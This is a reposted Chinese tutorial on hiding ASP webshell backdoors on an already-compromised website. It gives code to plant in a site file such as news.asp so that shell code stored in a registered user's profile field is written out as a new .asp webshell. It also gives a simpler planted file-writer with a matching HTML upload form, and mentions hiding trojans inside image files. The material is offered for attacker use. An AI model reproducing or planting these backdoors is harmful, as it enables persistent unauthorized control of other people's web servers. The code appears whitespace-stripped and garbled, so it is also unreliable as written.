1. 云栖社区>
  2. 技术文集>
  3. 列表>
  4. 正文

教你巧妙利用.mdb后缀数据库做后门

作者:用户 来源:互联网 时间:2016-04-07 11:16:57

文件方法代码一个ASP后门后门WebShell写到文件生成后门木马

教你巧妙利用.mdb后缀数据库做后门 - 摘要: 本文讲的是教你巧妙利用.mdb后缀数据库做后门, 数据|数据库 前言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也

数据|数据库

前言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也相信大多数的网管学会了关键字的搜索方法来搜索这些木马,当然现在的时间如果再象隐藏后门就要讲些技巧啦,俗话说的好“佛高一尺,我高一丈”。

我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦写到mp3文件里写到doc文件里都是可以的啦。

copy文件名/参数+文件名/参数生成文件名

这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的中,前提是在我们拿到一个webshell之后……

我们所知道的,很多站点在用户注册的时候要让填好多东西例如:用户名、密码、QQ、邮箱、个人简介、电话、联系方式、住址一类的。而对应到中也都会有相应的表、字段、值。我今天要做的就是,我注册一个用户在我的个人简介的地方上写入shell代码,然后修改他站点上的一个文件,使用的时候触发这个文件,就把我个人简历中的shell代码,备份到当前目录下。

废话少说了,大家看代码:


<%
ifrequest("action")="firefox"then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
setrs=server.createobject("ADODB.recordset")
sql="select"&bname&"from"&tname&"where"&id&"="&idvalue&""""
rs.opensql,conn,1,3
ifnotrs.eofthen
content=rs(bname)
else
response.write"Nothing"
endif
setfso=Server.createObject("Scripting.FileSystemObject")
settxtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
endif
%>

将上边的代码加到站点的一个文件中,如news.asp。根据我们了解的信息,在其站点注册后,下载看结构。我注册的firefox名字是在user表,其id值为119用于存放我注册简历的表字段为jl。

news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119

那么在使用的时候我们就可以在news.asp相同目录下写入一个名为firefox.asp的webshell。以上可以说是万千隐藏方法中的一种,下边再说另外一种更方便的隐藏方法,这个方法就和mdb后缀无关系了。

同样我们还是修改news.asp,将以下代码插入到对方news.asp中:


<%
ifrequest("action")="firefox"then
n=request.form("n")
c=request.form("c")
setfso=Server.createObject("Scripting.FileSystemObject")
settxtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
endif
%>

这段代码相对简单些,算是一个木马的服务端吧。使用的时候以这段代码配合:


<HTML><HEAD>
<METAhttp-equiv=Content-Typecontent="text/html;charset=gb2312">
<title>F.s.t火狐技术联盟[www.wrsky.com]</title>
<FORMaction="...method=post>
<METAcontent="MSHTML6.00.2900.2180"name=GENERATOR></HEAD>
<BODY>Name:<INPUTsize=50
name=nwidth="32"><BR><BR>Shell:<TEXTAREAname=crows=10cols=80
width="32"></TEXTAREA><INPUTtype=submitvalue=Save></FORM></BODY></HTML>

将以上代码中的:“http://localhost/config.asp?action=firefox”替换成你的服务端地址,然后保存为本地的.htm文件。本地打开后定义要生成的文件名、文件内容、远程提交,ok,又是一种留后门的方法。



以上是教你巧妙利用.mdb后缀数据库做后门的全部内容,在云栖社区的博客、问答、公众号、人物、课程等栏目也有教你巧妙利用.mdb后缀数据库做后门 的相关内容,欢迎继续使用右上角搜索按钮进行搜索文件 , 方法 , 代码 , 一个 , ASP后门 , 后门 , WebShell , 写到文件 生成后门木马 数据库后门、mysql数据库后门、mdb数据库、mdb数据库查看器、mdb数据库编辑器,以便于您获取更多的相关知识。

mdb-利用SQL语句将原来的数据表进行修改

... 用oledbcommand.executequery执行 解决方案四: 你应该在数据库中设置一列为主键,换言之,这一列必须是唯一的。 解决方案五: 直接用update table dgv=新值 where id=要改的那条数据id就可以了。.

教你识别简单的免查杀PHP后门_php技巧

一个最常见的一句话后门可能写作这样 或这样 tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: 构造生成,当然,嫌太直观可以写作这样 复制代码 代码如下: 然后再填充些普通代码进行伪装,一个...

教你识别简单的免查杀PHP后门

一个最常见的一句话后门可能写作这样 或这样 tudouya 同学在FREEBUF上给出[一种构造技巧]利用 构造生成,当然,嫌太直观可以写作这样 然后再填充些普通代码进行伪装,一个简单的”免杀”shell样本就出现了我们再来看看号称史上最...

MySQL数据库下载漏洞攻击技术

  作为脚本漏洞的头号杀手锏――数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以...

利用javascript压缩工具留下后门

...08的文章” Deniable Backdoors Using Compiler Bugs”中,作者提到了利用CLANG编译器本身的bug来生成一个有后门的sudo,使其允许任何用户获取root权限。这种技术相当猥琐,毕竟没人能通过审查源码就证明他们对sudo的修改是一个后门;相反...

前三篇
后三篇